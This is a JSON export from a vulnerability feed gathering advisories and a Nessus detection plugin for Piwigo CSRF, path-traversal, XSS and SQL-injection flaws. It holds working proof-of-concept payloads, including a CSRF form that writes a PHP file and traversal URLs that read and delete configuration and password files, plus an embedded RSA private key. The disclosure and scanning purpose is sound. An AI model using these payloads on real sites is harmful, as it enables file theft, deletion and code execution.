\nhttp://piwigo.org/releases/2.4.7 \nhttp://piwigo.org/bugs/view.php?id=0002843 \nhttp://piwigo.org/bugs/view.php?id=0002844 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo. \n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. 
\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/120592/piwigo246-traversalxsrf.txt"}, {"lastseen": "2016-12-05T22:11:36", "description": "", "published": "2014-12-20T00:00:00", "type": "packetstorm", "title": "Piwigo 2.7.2 Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469", "CVE-2014-1470"], "modified": "2014-12-20T00:00:00", "id": "PACKETSTORM:129665", "href": "https://packetstormsecurity.com/files/129665/Piwigo-2.7.2-Cross-Site-Scripting-SQL-Injection.html", "sourceData": "` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \nINDEPENDENT SECURITY RESEARCHER \nPENETRATION TESTING SECURITY \n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= \n \n \n# Exploit Title: Piwigo - SQL Injection / Cross Site Scripting Vulnerability's \n# Date: 19/12/2014 \n# Url Vendor: http://www.piwigo.org/ \n# Vendor Name: Piwigo \n# Version: 2.7.2 \n# CVE: CVE-2014-1470 \n# CVE References: CVE-2013-1468, CVE-2013-1469 \n# Author: TaurusOmar \n# Tiwtter: @TaurusOmar_ \n# Email: taurusomar13@gmail.com \n# Home: overhat.blogspot.com \n# Tested On: Bugtraq Optimus \n# Risk: High \n \n \nDescription \nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. 
\n \n \n------------------------ \n+ CROSS SITE SCRIPTING + \n------------------------ \n# Exploiting Description - Get into code xss in the box of group list. \n \n<fieldset> \n<legend>Add Group</legend><p> \n<strong>Name Group</strong><br> \nYOUR GROUP NAME O POC \n<input type=\"text\" size=\"20\" maxlength=\"50\" name=\"groupname\"></p> \n<p class=\"actionButtons\"> \n<input type=\"submit\" value=\"Add\" name=\"submit_add\" class=\"submit\"> \n<a id=\"addGroupClose\" href=\"#\">Cancel</a></p> \n<input type=\"hidden\" value=\"24322c55681c00da423a8a7b21b79640\" name=\"pwg_token\"> \n</fieldset> \n \n#P0c \n\"><img src=x onerror=prompt(1);> \n \n#Proof Concept \nhttp://i.imgur.com/qFyJz6q.jpg \n \n \n------------------------ \n+ Sql Injection + \n------------------------ \n# Exploiting Description - Sql Injection in control panel of admin and others users . \n \n#P0c \nhttp://site.com/piwigo/admin.php?page=history&search_id=5' \n \nSELECT \ndate, \ntime, \nuser_id, \nIP, \nsection, \ncategory_id, \ntag_ids, \nimage_id, \nimage_type \nFROM ucea_history \nWHERE \n; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830 \n \n#Proof Concept \nhttp://i.imgur.com/wpzMmmu.jpg \n \n \n-----BEGIN RSA PRIVATE KEY----- \nMIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl \nMq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi \n2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB \nAoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8 \nGaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX \nX5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/ \nWyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R \n8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL \nWvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM \n8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM \nBVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY 
\nZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J \nX54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/ \n-----END RSA PRIVATE KEY----- \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129665/piwigo272-sqlxss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPiwigo 2.4.6 - Multiple Vulnerabilities", "edition": 1, "published": "2013-03-01T00:00:00", "title": "Piwigo 2.4.6 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "modified": "2013-03-01T00:00:00", "id": "EXPLOITPACK:FC43DD51AE00C5F5F8AE623AD85B84A9", "href": "", "sourceData": "Advisory ID: HTB23144\nProduct: Piwigo\nVendor: Piwigo project\nVulnerable Version(s): 2.4.6 and probably prior\nTested Version: 2.4.6\nVendor Notification: February 6, 2013 \nVendor Patch: February 19, 2013 \nPublic Disclosure: February 27, 2013 \nVulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal [CWE-22]\nCVE References: CVE-2013-1468, CVE-2013-1469\nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 (AV:N/AC:H/Au:N/C:P/I:N/A:P)\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform \u0421ross-Site Request Forgery and Path Traversal attacks.\n\n\n1) \u0421ross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468\n\nThe vulnerability exists due to insufficient verification of the HTTP request origin in \"/admin.php\" script. 
A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create arbitrary PHP file on the remote server.\n\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL:\n\n\n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\">\n<input type=\"hidden\" name='edited_file' value='file.php'>\n<input type=\"hidden\" name='text' value=' phpinfo(); '>\n<input type=\"hidden\" name='submit' value='1'>\n<input type=\"submit\" id=\"btn\">\n</form>\n<script>\ndocument.f1.submit();\n</script>\n\n\nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default).\n\n\n2) Path Traversal in Piwigo: CVE-2013-1469\n\nThe vulnerability exists due to insufficient filtration of user-supplied input in \"dl\" HTTP GET parameter passed to \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by attacker without any restrictions. The vulnerable code is:\n\n\nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\n{\n $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\n ...\n echo file_get_contents($filename);\n ...\n}\n\n\nHowever, the vulnerability may be exploited only if PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in default PHP installation on Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation remote attacker can read content of arbitrary files on the vulnerable system. 
\nImportant: after being read the file is deleted (if web server has write permission to it).\n\n\nThe following PoC (Proof of Concept) code will display and delete the application's configuration file:\n\nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpgrade to Piwigo 2.4.7\n\nMore Information:\nhttp://piwigo.org/releases/2.4.7\nhttp://piwigo.org/bugs/view.php?id=0002843\nhttp://piwigo.org/bugs/view.php?id=0002844\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23144 - https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.\n[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the web, built by an active community of users and developers.\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:43", "description": "\nPiwigo 2.7.2 - Multiple Vulnerabilities", "edition": 1, "published": "2014-12-19T00:00:00", "title": "Piwigo 2.7.2 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1468", "CVE-2013-1469", "CVE-2014-1470"], "modified": "2014-12-19T00:00:00", "id": "EXPLOITPACK:35BF0A351E54F0662E6298A2615F1201", "href": "", "sourceData": " -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n INDEPENDENT SECURITY RESEARCHER \n PENETRATION TESTING SECURITY\n -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n \n\n# Exploit Title: Piwigo 2.7.2 - SQL Injection / Cross Site Scripting Vulnerability's \n# Date: 19/12/2014\n# Url Vendor: http://www.piwigo.org/\n# Vendor Name: Piwigo \n# Version: 2.7.2\n# CVE: CVE-2014-1470\n# CVE References: CVE-2013-1468, CVE-2013-1469\n# Author: TaurusOmar\t\n# Tiwtter: @TaurusOmar_\n# Email: taurusomar13@gmail.com\n# Home: overhat.blogspot.com\n# Tested On: Bugtraq Optimus\n# Risk: High\n\n\nDescription\nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.\n\n\n------------------------\n+ CROSS SITE SCRIPTING + \n------------------------\n# Exploiting Description - Get into code xss in the box of group list. 
\n\n<fieldset>\n<legend>Add Group</legend><p>\n<strong>Name Group</strong><br>\nYOUR GROUP NAME O POC\n<input type=\"text\" size=\"20\" maxlength=\"50\" name=\"groupname\"></p>\n<p class=\"actionButtons\">\n<input type=\"submit\" value=\"Add\" name=\"submit_add\" class=\"submit\">\n<a id=\"addGroupClose\" href=\"#\">Cancel</a></p>\n<input type=\"hidden\" value=\"24322c55681c00da423a8a7b21b79640\" name=\"pwg_token\">\n</fieldset>\n\n#P0c\n\"><img src=x onerror=prompt(1);>\n\n#Proof Concept\nhttp://i.imgur.com/qFyJz6q.jpg\n\n\n------------------------\n+ Sql Injection +\n------------------------\n# Exploiting Description - Sql Injection in control panel of admin and others users . \n\n#P0c\nhttp://site.com/piwigo/admin.php?page=history&search_id=5'\n\nSELECT\n date,\n time,\n user_id,\n IP,\n section,\n category_id,\n tag_ids,\n image_id,\n image_type\n FROM ucea_history\n WHERE \n; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830\n\n#Proof Concept\nhttp://i.imgur.com/wpzMmmu.jpg", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "htbridge": [{"lastseen": "2020-12-24T11:43:58", "bulletinFamily": "software", "cvelist": ["CVE-2013-1468", "CVE-2013-1469"], "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Piwigo, which can be exploited to perform Cross-Site Request Forgery and Path Traversal attacks. \n \n1) Cross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468 \nThe vulnerability exists due to insufficient verification of the HTTP request origin in the \"/admin.php\" script. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and create an arbitrary PHP file on the remote server. 
\nThe following PoC (Proof of Concept) code creates a file \"file.php\" containing \"phpinfo();\", which can be later accessed via the http://[host]/file.php URL: \n<form action=\"http://[host]/admin.php?page=plugin-LocalFilesEditor\" method=\"post\" name=\"f1\"> \n<input type=\"hidden\" name='edited_file' value='file.php'> \n<input type=\"hidden\" name='text' value=' phpinfo(); '> \n<input type=\"hidden\" name='submit' value='1'> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.submit(); \n</script> \nSuccessful exploitation requires that the \"LocalFiles Editor\" plugin is enabled (disabled by default). \n \n2) Path Traversal in Piwigo: CVE-2013-1469 \nThe vulnerability exists due to insufficient filtering of user-supplied input in the \"dl\" HTTP GET parameter passed to the \"/install.php\" script. The script is present on the system after installation by default, and can be accessed by an attacker without any restrictions. The vulnerable code is: \nif (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n{ \n$filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n... \necho file_get_contents($filename); \n... \n} \nHowever, the vulnerability may be exploited only if the PHP 'file_exists' function returns 'true' both for \"C:/boot.ini\" (or any existing file) and for \"C:/any_non_existing_directory/../boot.ini\" (in our case the non-existing directory in path is \"/pwg_/\"). This works in a default PHP installation on the Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful exploitation a remote attacker can read the contents of arbitrary files on the vulnerable system. \nImportant: after being read the file is deleted (if the web server has write permission to it). 
\n \nThe following PoC (Proof of Concept) code will display and delete the application's configuration file: \nhttp://piwigo/install.php?dl=/../../local/config/database.inc.php \n\n", "modified": "2013-02-20T00:00:00", "published": "2013-02-06T00:00:00", "id": "HTB23144", "href": "https://www.htbridge.com/advisory/HTB23144", "type": "htbridge", "title": "Multiple Vulnerabilities in Piwigo", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/"}}], "zeroscience": [{"lastseen": "2020-11-06T21:17:52", "description": "Title: Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability \nAdvisory ID: [ZSL-2013-5127](<ZSL-2013-5127.php>) \nType: Local/Remote \nImpact: Manipulation of data, Exposure of system information, Exposure of sensitive information \nRisk: (3/5) \nRelease Date: 18.02.2013 \n\n\n##### Summary\n\nPiwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures. \n\n##### Description\n\nInput passed to the 'dl' parameter in 'install.php' script is not properly sanitised before being used to get the contents of a resource or delete files. This can be exploited to read and delete arbitrary data from local resources with the permissions of the web server via directory traversal attack. 
\n \n\\-------------------------------------------------------------------------------- \n \n` /install.php: \n------------- \n \n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])) \n114: { \n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']; \n116: header('Cache-Control: no-cache, must-revalidate'); \n117: header('Pragma: no-cache'); \n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"'); \n119: header('Content-Transfer-Encoding: binary'); \n120: header('Content-Length: '.filesize($filename)); \n121: echo file_get_contents($filename); \n122: unlink($filename); \n123: exit(); \n124: } \n` \n\\-------------------------------------------------------------------------------- \n \n\n\n##### Vendor\n\nPiwigo project - <http://www.piwigo.org>\n\n##### Affected Version\n\n2.4.6 \n\n##### Tested On\n\nMicrosoft Windows 7 Ultimate SP1 (EN) \nApache 2.4.2 (Win32) \nPHP 5.4.4 \nMySQL 5.5.25a \n\n##### Vendor Status\n\n[15.02.2013] Vulnerability discovered. \n[15.02.2013] Initial contact with the vendor. \n[15.02.2013] Vendor responds asking more details. \n[16.02.2013] Sent details to the vendor. \n[16.02.2013] Vendor confirms the vulnerability. \n[16.02.2013] Working with the vendor. \n[18.02.2013] Vendor releases fix for this issue. \n[18.02.2013] Coordinated public security advisory released. \n[19.02.2013] Vendor releases version 2.4.7. 
\n\n##### PoC\n\n[piwigo_rd.txt](<../../codes/piwigo_rd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://piwigo.org/bugs/view.php?id=2843> \n[2] <http://cxsecurity.com/issue/WLB-2013020126> \n[3] <http://www.exploit-db.com/exploits/24520> \n[4] <http://packetstormsecurity.com/files/120380> \n[5] <http://piwigo.org/releases/2.4.7> \n[6] <http://www.osvdb.org/show/osvdb/90357> \n[7] <http://www.securityfocus.com/bid/58016> \n[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1469>\n\n##### Changelog\n\n[18.02.2013] - Initial release \n[19.02.2013] - Added reference [3] and [4] \n[20.02.2013] - Added vendor status and reference [5] and [6] \n[21.02.2013] - Added reference [7] \n[02.03.2013] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 12, "published": "2013-02-18T00:00:00", "title": "Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability", "type": "zeroscience", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1469"], "modified": "2013-02-18T00:00:00", "id": "ZSL-2013-5127", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php", "sourceData": "\nPiwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability\n\n\nVendor: Piwigo project\nProduct web page: http://www.piwigo.org\nAffected version: 2.4.6\n\nSummary: Piwigo is a photo gallery software for the web that comes\nwith powerful features to publish and manage your collection of\npictures.\n\nDesc: Input passed to the 'dl' parameter in 'install.php' script\nis not properly sanitised before being used to get the contents of\na resource or delete files. 
This can be exploited to read and delete\narbitrary data from local resources with the permissions of the web\nserver via directory traversal attack.\n\n====================================================================\n/install.php:\n-------------\n\n113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))\n114: {\n115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];\n116: header('Cache-Control: no-cache, must-revalidate');\n117: header('Pragma: no-cache');\n118: header('Content-Disposition: attachment; filename=\"database.inc.php\"');\n119: header('Content-Transfer-Encoding: binary');\n120: header('Content-Length: '.filesize($filename));\n121: echo file_get_contents($filename);\n122: unlink($filename);\n123: exit();\n124: }\n\n====================================================================\n\n\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\n Apache 2.4.2 (Win32)\n PHP 5.4.4\n MySQL 5.5.25a\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2013-5127\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\n\nVendor Patch: http://piwigo.org/bugs/view.php?id=2843\n\n\n\n15.02.2013\n\n\n--\n\nhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt\n\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/piwigo_rd.txt"}], "nessus": [{"lastseen": "2021-01-01T04:55:03", "description": "The version of Piwigo hosted on the remote web server is affected by a\ndirectory traversal vulnerability because it fails to properly sanitize\nuser-supplied input to the 'dl' parameter of the 'install.php' script. \nThis vulnerability could allow an unauthenticated, remote attacker to\nread and delete arbitrary files by forming a request containing\ndirectory traversal sequences. 
\n\nNote that the application is reportedly also affected by a cross-site\nrequest forgery vulnerability, although Nessus has not tested this.", "edition": 27, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"}, "published": "2013-04-02T00:00:00", "title": "Piwigo install.php dl Parameter Traversal Arbitrary File Access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1469"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:piwigo:piwigo"], "id": "PIWIGO_INSTALL_FILE_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/65769", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(65769);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-1469\");\n script_bugtraq_id(58016);\n script_xref(name:\"EDB-ID\", value:\"24520\");\n\n script_name(english:\"Piwigo install.php dl Parameter Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to view an arbitrary file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is affected by a\ndirectory traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Piwigo hosted on the remote web server is affected by a\ndirectory traversal vulnerability because it fails to properly sanitize\nuser-supplied input to the 'dl' parameter of the 'install.php' script. \nThis vulnerability could allow an unauthenticated, remote attacker to\nread and delete arbitrary files by forming a request containing\ndirectory traversal sequences. 
\n\nNote that the application is reportedly also affected by a cross-site\nrequest forgery vulnerability, although Nessus has not tested this.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://piwigo.org/release-2.4.7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.4.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1469\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:piwigo:piwigo\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"piwigo_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/piwigo\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(\n appname : \"piwigo\",\n port : port,\n exit_on_fail : TRUE\n);\n\ndir = install[\"dir\"];\ninstall_url = build_url(port:port, qs:dir);\n\nurl = \"/install.php?dl=../../../install.php\";\n\nres = http_send_recv3(\n method : \"GET\",\n item : dir + url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\n \"<?php\" >< res[2] &&\n \"if (isset($_POST['install']))\" >< res[2]\n)\n{\n # Grab vulnerable code section for report\n out = strstr(res[2], \"if (!empty($_GET['dl'])\");\n # Truncate to 15 lines\n count = 0;\n foreach line (split(out))\n {\n output += line;\n count ++;\n if (count >= 15) break;\n }\n\n if (report_verbosity > 0)\n {\n snip = crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30);\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + install_url + url +\n '\\n' +\n '\\nNote that the file \"install.php\" has been deleted by the request above.' + '\\n';\n if (report_verbosity > 1)\n {\n report +=\n '\\n' + 'This produced the following truncated output :' +\n '\\n' +\n '\\n' + snip +\n '\\n' + chomp(output) +\n '\\n' + snip +\n '\\n';\n }\n security_warning(port:port, extra:data_protection::sanitize_user_paths(report_text:report));\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Piwigo\", install_url);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:P"}}]}